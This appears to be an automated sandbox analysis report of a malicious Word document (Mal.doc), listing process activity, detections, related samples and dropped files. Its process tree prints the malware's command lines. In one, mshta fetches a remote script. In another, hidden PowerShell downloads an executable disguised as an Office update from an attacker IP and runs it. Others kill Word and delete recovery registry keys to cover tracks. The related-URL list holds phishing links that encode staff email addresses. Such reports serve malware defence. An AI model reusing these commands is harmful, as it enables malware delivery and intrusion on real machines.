Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Behavior Graph

Simulations

Behavior and APIs

Time	Description
22:18:01	75x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
22:18:10	120x Sleep call for process: mshta.exe modified from: 60000ms to: 500ms
22:18:23	1x Sleep call for process: taskkill.exe modified from: 60000ms to: 500ms
22:18:42	2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 500ms

Antivirus Detection

Initial Sample

Source	Ratio	Cloud	Link
Mal.doc	10/58	virustotal	Browse

Dropped Files

Source	Ratio	Cloud	Link
57C8EDB95DF3F0AD4EE2DC2B8CFD41570	0/59	virustotal	Browse
696F3DE637E6DE85B458996D49D759AD0	0/58	virustotal	Browse

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
Azar-AKft	25ghrdhhahznt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	81xeuvrqvaews.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	27gmhsmxougsnk.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	27gmhsmxougsnk.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	23ksxsyxxwq.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	31dmkbpddi.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	65jlyvvvpahz.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	7xednblozndpn.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	17ivuvyughkt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	33yhwinlmt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	50pwunctmy.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	23jvwlyybfx.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	13yctckbxqdy.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	66qtcfxqkcrasz.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	25ghrdhhahznt.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	43egkemyskdggy.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	78bmuxgvmkey.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	31dmkbpddi.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	7xednblozndpn.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
	61keywerwors.exe	b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98	malicious	Browse	91.219.236.11
AkamaiInternationalBV	misosh.dll	cfb57ccd4ff5be4642c2d737ba602faf709ba6fa5adc3fde7003b14729bf29b2	suspicious	Browse	95.100.248.144
	price_list.exe	6f11c4bd4bef91e441b05ed7e3062a7abc88e5185b3da54bfbe022aa3ff4b24d	malicious	Browse	95.100.248.144
	EMS Tracking Digit.exe	6759fb8bb59194d261f57492d12f8c6ddb679870ca324a4c73640d0c605d3848	malicious	Browse	95.100.248.144
	Urgent.pdf	97c23396d9f34e268a6d05bd6012eb79c0d2fb5ebf75cd02b8812414021c1ba0	clean	Browse	95.100.248.90
	42Order Sample Picture.exe	b4076c7beba798e44a695bc5252255c4bcce0a8854acef2d839907e8d6e6a620	malicious	Browse	92.122.122.160
	output.pdf	600516dff7c5a6e68f79362ce59a09c2d7ccc5cd39686a91a3ee7137cdff8965	clean	Browse	95.100.248.144
	STATEMENT.pdf	0130fa24a5310f178b1b7422087994451cc68ec335b5a1df21125872edf8b531	clean	Browse	95.100.248.144
	Document1.pdf	d02a5da7f84cb7455c5510bf4f1bb4c2028f3b1fe41c22d08bd20c5c02cdecb8	suspicious	Browse	2.21.246.10

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4	https://bit.ly/2jhA71r		clean	Browse
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\696F3DE637E6DE85B458996D49D759AD	https://ahs.xilohs.com/app/Account/ChangePassword?resetCode=0e105053-f88a-48be-893d-2de2e207ede6&email=beverly.pawlak%40ahs.ca		clean	Browse
	http://www.biquzi.com/14_14969/7769633.html		clean	Browse
	http://economizart.com.br/plugin/secure/		clean	Browse
	http://outlookdomainwebhost11.form2pay.com/198698.html		clean	Browse
	TD BANK GROUP CORPORATE & BUSINESS CONSENT TO ELECTRONIC DELIVERY.pdf	1bda4836fb729bf6f5bd1ce8a84d9cce43dce912b8c1d2ca83ac19067b9906a2	suspicious	Browse
	http://omni-electric.com/inv.php?n=cGF1bGV0dGUud29sb3NoeW5AYWxiZXJ0YWhlYWx0aHNlcnZpY2VzLmNh		clean	Browse
	http://www.outlokkkkkkkkkkkadmkkfbnfnjnfjnjfnjfnfjnfjnfnfjfff.citymax.com/feedback_form.html		clean	Browse
	http://cheech-n-chongvapors.com/f.php?d=Y2hyaXN0aW5lLmNvb2tAYWxiZXJ0YWhlYWx0aHNlcnZpY2VzLmNh		clean	Browse
	http:///?ikfm.com/khrbfzdb		clean	Browse
	http://mdentree.com/file.php?d=bGF1cmVuLmJlYXVwcmVAYWxiZXJ0YWhlYWx0aHNlcnZpY2VzLmNh		clean	Browse
	https://ahs.xilohs.com/app/		clean	Browse
	http://hughesg.cabanova.com/		malicious	Browse
	http://poshbathbombs.net/file.php?d=[base64		clean	Browse
	https://docs.google.com/forms/d/e/1FAIpQLSecBI111VEkYSXax390nP8qmm-qfmkYg1e4VzK9hjMN7DJHog/viewform		clean	Browse
	Lacey Resume.doc	c84fca5ec9f60c8a001fa6662848321ac220987e1feb51fc6be350219be2509f	malicious	Browse
	http://apadriana.com/list.php?d=a3lsZS5ob3dzb25AYWxiZXJ0YWhlYWx0aHNlcnZpY2VzLmNh		clean	Browse
	http://bkscjhtice.onlinemarketinvoice.com/inv/michael.watts@albertahealthservices.ca/1656473140833828287727066416455844495		clean	Browse
	http://smallbusiness.intuit.com/small-business/privacy/index.jsp		clean	Browse
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	Invoice-45504-Apr-25-2017-US-071058.pdf	7a9ddae5279e0692bb58e7a5afd9be97800a92004d99af03f910ea5a4dbebe29	malicious	Browse
	Invoice.pdf	61d1c3cd23d7f66d5ad249df54a7cb3b50a06a220cb432f16017ec807c9f51ff	malicious	Browse

Screenshot

Startup

system is w7_1

WINWORD.EXE (PID: 3284 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Mal.doc MD5: 113371C5AC72FCE072F707C55E7845B9)

csc.exe (PID: 3368 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D)

cvtres.exe (PID: 3392 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESD201.tmp' 'c:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364)

mshta.exe (PID: 3448 cmdline: 'C:\Windows\System32\mshta.exe' http://91.219.236.207/img/word.db MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe; MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

taskkill.exe (PID: 3784 cmdline: 'C:\Windows\system32\taskkill.exe' /f /im winword.exe MD5: 94BDCAFBD584C979B385ADEE14B08AB4)

powershell.exe (PID: 3828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse; MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 3840 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\*' -include http*.pdb, http*.dll, *.cs MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

cmd.exe (PID: 3860 cmdline: 'C:\Windows\System32\cmd.exe' '/c start /MAX '' winword /q /mFile3 MD5: AD7B9C14083B52BC532FBA5948342B98)

WINWORD.EXE (PID: 3956 cmdline: winword /q /mFile3 MD5: 113371C5AC72FCE072F707C55E7845B9)

powershell.exe (PID: 3888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe'); MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

OfficeUpdte-KB9748956.exe (PID: 2228 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe' MD5: A7B990D5F57B244DD17E9A937A41E7F5)

cleanup

Created / dropped Files

Download Dropped Binaries:	Dropped Binaries

C:\Users\user~1\AppData\Local\Temp\RESD201.tmp
File Type:	X11 SNF font data, LSB first
MD5:	28D2A563E9523900D3938AB822FF9685
SHA1:	8C06F16B017725F2E74EE99516396561C8F69F1A
SHA-256:	8FA5BDA94D5BF1371B2472BAF40748508C6229C2E9AE6E37ED4C6D0C63AFF947
SHA-512:	17DC714A81EBC13AEC4F89330A5D9FD75851701E8AF418E88F4A80A6322C1F40A9CF6BEDCBEF945AFEAE639B78BA6BFABF95380F395714CD3688EC6E56F775AD
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD56B.tmp\Content.inf
File Type:	data
MD5:	31A80B239F86BFDD3DAC794223BFDBC7
SHA1:	741A9B65325997417DBE2F8E8E022F6513073A58
SHA-256:	AF9AF29E9D0F76B8CD9EEC9D2D438C89E6A4CD9EA7F0D17017C65365F1453E39
SHA-512:	5C915D2A513ED63CAEF9225580AA9502373CFDB055F6009B41FF3F61C3F9300CC120335F6F2A7F1CB72FAC4E2E307A5B2A97D15C4CC2B7E8530BE5CEDDEB2EED
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD56B.tmp\Median.dotx
File Type:	Zip archive data, at least v2.0 to extract
MD5:	5ED47F76BCE66C508F43D8A01319C07B
SHA1:	AEF9A8E03669F492E7531050E5670FF2A25A8A3B
SHA-256:	9782388A726A76752E70403635D7139F1485302896B990B11C0C32DB368C7B6B
SHA-512:	4F2AE99BF339CE4BD8B3421B85962607542F355956C98530FC5103CFB7B3FA54A584194D5E45AE1BFB88048F9C4FA726E22B41D4E0A3C2A83E5321F02650BEF5
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD58B.tmp\Content.inf
File Type:	data
MD5:	0571B540BECA90F0D45B9E7C24A6A634
SHA1:	C6C07F7892EF724F3F641FDB860FEC6FB235C218
SHA-256:	A4D16C9A482EC17FC8A18E4B50EF2C8E1B7F73E1C168E31BF2386527F6D66302
SHA-512:	398D069C5F24816119E81F419D56D0C07394B7CB084D70785C70245CA7A0EAFD35598E0141E15045B2C6A8F3048A54D58305CF6128D394F3472A4E039CAD195D
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD58B.tmp\Equity.dotx
File Type:	Zip archive data, at least v2.0 to extract
MD5:	88043E109FA9B2DD1F213EEEA6FB7A6D
SHA1:	CFF3EFAB49334F3C1804B3C0E846E8F4EE7E6414
SHA-256:	2555F5390B8C16D3EF27B6A458057537421C957CE5D8B544626816D643612A6D
SHA-512:	6C874CAF5AEA3C5AC1BE1C26A01D9BD2D7A458FED4B834CA7FA8B84A4DDAAD1A1ECF6B8A80960601CFC3333777F86743E3B22709BC97830E2EFDEEFB95777D10
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD59C.tmp\Content.inf
File Type:	data
MD5:	D79B5DE6D93AC06005761D88783B3EE6
SHA1:	E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
SHA-256:	96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
SHA-512:	34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD59C.tmp\architecture.glox
File Type:	Zip archive data, at least v1.0 to extract
MD5:	DE10C56C0A4B7B9B5411B8CECCC08D37
SHA1:	1BDE826AECED695D462A1B1BC6E2B1C7CA8169A6
SHA-256:	64A35F136D1558FBAD27FE2CC50918335260A3B6D1B7F9ADC0A3564FB77DD088
SHA-512:	7E3EC64DEC1A3C01C4794EB3F76F5B1B680465B6882066A0648EC7F9837BBA38D00BF8C5D9EE8AD054F477B86AEC943AC36EBEF966D642E9D9BDA78E9C96714A
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD734.tmp\Content.inf
File Type:	data
MD5:	3911A8E828322EAE60F73DBB0762B1B4
SHA1:	320631CE08CFAF675A2AAA051F851BA7DC54C242
SHA-256:	8577AB8251356B99EBCD6F122A878E517E5A1C31779DD7C5AC42AB3495E52F7D
SHA-512:	833474DC52D5520E789DD82628F8675C6BE3730ED1EF5C3E08A358F907CBCCC07D2951F6F24F90B07A8F414903C986F60B77EA294E6DFDB25C60C566DCEBBE80
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDD734.tmp\chevronaccent_TP101793938.glox
File Type:	Zip archive data, at least v2.0 to extract
MD5:	69C32874EA6366383983CD4987A4BFCA
SHA1:	4CCF05AD618E49D32755833FFC0686D8ABDFFDA5
SHA-256:	EC8A857FA8DE8B93B0DBF59771011B87C7B3E09B44DFD3381B6D2D60DF2D0770
SHA-512:	391AFF345D772CDE8C0A257DA61C17E55090638BEFCBD0A7DF777EC56F79187472A5C9D4D7AF82F880BC616AB2B8745D2B2E82CCAAF352174B0A0965E65160AF
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDDEE7.tmp\BracketList.glox
File Type:	Zip archive data, at least v2.0 to extract
MD5:	F73A0BDE2E976C5A1B16421B7A3F5F29
SHA1:	EE26EA82DF8BA91EA5B173C2D1D129C66DD2C5E2
SHA-256:	59A841CC6AFEB3F2ED26A9DC307282869C0D20602BB078FDA0D88A0B62727390
SHA-512:	AA6A555A84CF41F336A3E2D124C233877623C4F6FCE6DF1B82DBD142160F8D63054056569D0E382C8ACC83C58AEB4E175C1C8486497DCED0173932B19B9D73CE
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDDEE7.tmp\Content.inf
File Type:	data
MD5:	1A314B08BB9194A41E3794EF54017811
SHA1:	D1E70DB69CA737101524C75E634BB72F969464FF
SHA-256:	9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
SHA-512:	AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDE580.tmp\Content.inf
File Type:	data
MD5:	BCD007310716D3C51EAB01349B3A573A
SHA1:	648DC703F6A0FA3770F004608CAAB6BC8BE7D406
SHA-256:	999EFC9877517DA3C25CAFEA20075B816564427D52D96554E8FEF62DFC0496D6
SHA-512:	B1C4588CC82A3D2C6F955039242D0BED6B7B3A1B7CBF0CAE8F59BEEB1570713D1D9F1FDC4DE1BEA78B6B11CCCFD893EA7A4115D8174A533E5B6F1A85FA9C7607
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDE580.tmp\Sketchbook.thmx
File Type:	Zip archive data, at least v2.0 to extract
MD5:	3DAB7507730D5EB7FEDB0B99EFAEBBDA
SHA1:	B5E416B358A774F0F499228DFFF6DB2986D78346
SHA-256:	E32521D26457DDEC051ACBFABC9008C764AF0B34B5F6B161B096BFA729F904DF
SHA-512:	1F6E7C18D1BB46B69FC6D128C2B9452FB4DDA685961F166359E8DF22951C17FC58D0679D8DBBB787F89FDCEA8E53E60948D9FD0496671A2334C14C026AAD71F2
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDEBCB.tmp\Content.inf
File Type:	data
MD5:	30C318A367937E35DEEEE53D03341EFE
SHA1:	C12D989620E2453EDE451ADC1CB4185527A3AE8F
SHA-256:	BA0D957F7665E1ABFAC4DA7E7C0A1B71960D22259E16078F55A4F5FB681A4EAF
SHA-512:	8A65ACC93BFFAD97555065376FA7A917DED44794C076F9BE94DA1783DC515A76764531A42E29392D4D80D20C5266133049CA8A4833EDB084F79FA9CE24847C66
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDEBCB.tmp\Mylar.thmx
File Type:	Zip archive data, at least v2.0 to extract
MD5:	C70216464C9A649878BFC2F79F56C304
SHA1:	518362EDB01FA34259F7C0F68FDB7EF5ADC93B7B
SHA-256:	4339C874CEB83AA91AE787425F48FBE6A108B0A34834FBA2109065A605AAA15F
SHA-512:	0619A13146D74CFD4B976224A1F3EF1C807EFEEE8CBAF229EFDE35E843AD7A27234A13CB4FB7EDE64D09325CE8E77A82FA7A510E97AC15D4295850D613B79926
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF023.tmp\Content.inf
File Type:	data
MD5:	3220EA9A4CE0356DBFF629E8F9A0F0E9
SHA1:	3E4F05B8A8CE4FD2C390EC6353F13F9A8078F52E
SHA-256:	93F8EEB1D10A3FF8E1A27321DE88F36FEC859A61980AFED51AC6200077277663
SHA-512:	D8FB02BA0AC4075E3D8D6A93F486AE936CA6C8518CA3A1FE1666C0AAB2C4DA6F4D81E54EC4D7FA5D0DCF113A731F365CF547E27F8D0030DAD97FD08D692D3BA6
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF023.tmp\Decatur.thmx
File Type:	Zip archive data, at least v2.0 to extract
MD5:	69F65CBBEF59413A32E72B3F460702D4
SHA1:	0A2979D79FE82632F1EB77B9EFD498EB6A5BA4E9
SHA-256:	742EBFBCD95E3EE5E7C9692A25B622070A66D7A45AB426292F5173FF83561920
SHA-512:	F21E2E77878779F7711ADEE972DAA7AB72D7A699B6C9FF50789C1EB7342DE893AE8FB16AB3EBB8EEC5E0421CBD7898F6706D2CF5389D589C548191201B11A7F1
Malicious:	false

C:\Users\user~1\AppData\Local\Temp\TCDF380.tmp\Content.inf
File Type:	data
MD5:	C1B36A0547FB75445957A619201143AC
SHA1:	CDB0A18152F57653F1A707D39F3D7FB504E244A7
SHA-256:	4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
